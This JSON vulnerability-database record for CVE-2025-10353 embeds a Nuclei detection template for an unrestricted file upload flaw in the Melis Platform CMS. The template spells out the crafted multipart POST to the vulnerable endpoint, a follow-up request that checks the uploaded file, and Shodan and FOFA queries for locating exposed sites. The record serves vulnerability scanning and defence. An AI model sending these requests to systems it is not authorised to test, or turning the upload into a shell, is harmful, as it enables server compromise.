{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2025-10353/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2025-10353/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2025-10353/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2025-10353/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2025-10353/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2025-10353"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2025-10353"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2025/CVE-2025-10353.yaml",
    "nuclei_template_severity": "critical",
    "nuclei_template_yaml": "id: CVE-2025-10353\n\ninfo:\n  name: Melis Technology Melis Platform - Unrestricted File Upload & Remote Code Execution\n  author: ohmygod20260203\n  severity: critical\n  description: |\n    Melis Technology Melis Platform contains an unrestricted file upload caused by insufficient validation of 'mcsdetail_img' parameter in /melis/MelisCmsSlider/MelisCmsSliderDetails/saveDetailsForm, letting attackers upload malicious files and achieve remote code execution, exploit requires crafted POST request.\n  impact: |\n    Attackers can upload malicious files leading to remote code execution and full system compromise.\n  remediation: |\n    Update to the latest version with the vulnerability fixed.\n  reference:\n    - https://github.com/ivansmc00/CVE-2025-10353-POC\n    - https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-melis-platform\n    - https://nvd.nist.gov/vuln/detail/CVE-2025-10353\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2025-10353\n    epss-score: 0.0266\n    epss-percentile: 0.85057\n    cwe-id: CWE-434\n  metadata:\n    verified: true\n    max-request: 2\n    shodan-query: http.html:\"/melis/MelisCms\"\n    fofa-query: body=\"/melis/MelisCms\" || body=\"MelisDemoCms\"\n    product: melis-platform\n    vendor: melis-technology\n  tags: cve,cve2025,melis,cms,file-upload,rce,intrusive,vkev\n\nvariables:\n  rand: \"{{to_lower(rand_text_alpha(5))}}\"\n  filename: \"{{rand}}.txt\"\n  payload: \"CVE-2025-10353-{{rand}}\"\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        POST /melis/MelisCmsSlider/MelisCmsSliderDetails/saveDetailsForm HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: multipart/form-data; boundary=----{{rand}}\n\n        ------{{rand}}\n        Content-Disposition: form-data; name=\"mcsdetail_mcslider_id\"\n\n        0\n        ------{{rand}}\n        Content-Disposition: form-data; name=\"mcsdetail_img\"; filename=\"{{filename}}\"\n        Content-Type: text/plain\n\n        {{payload}}\n        ------{{rand}}--\n\n    matchers:\n      - type: dsl\n        internal: true\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"success\") || contains(body, \"uploaded\")'\n        condition: and\n\n  - raw:\n      - |\n        GET /media/sliders/0/{{filename}} HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, payload)'\n        condition: and\n\n    extractors:\n      - type: dsl\n        dsl:\n          - 'host + \"/media/sliders/0/\" + filename'\n# digest: 4b0a00483046022100a6c2b3511fdabab8701a7636ff397eacdd959988519d7bf0944cbc9a3df14d610221008cce68811006058d1e5a3f886dbb54d735372e0740949bd32812bafe74c05714:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2025-10353"
}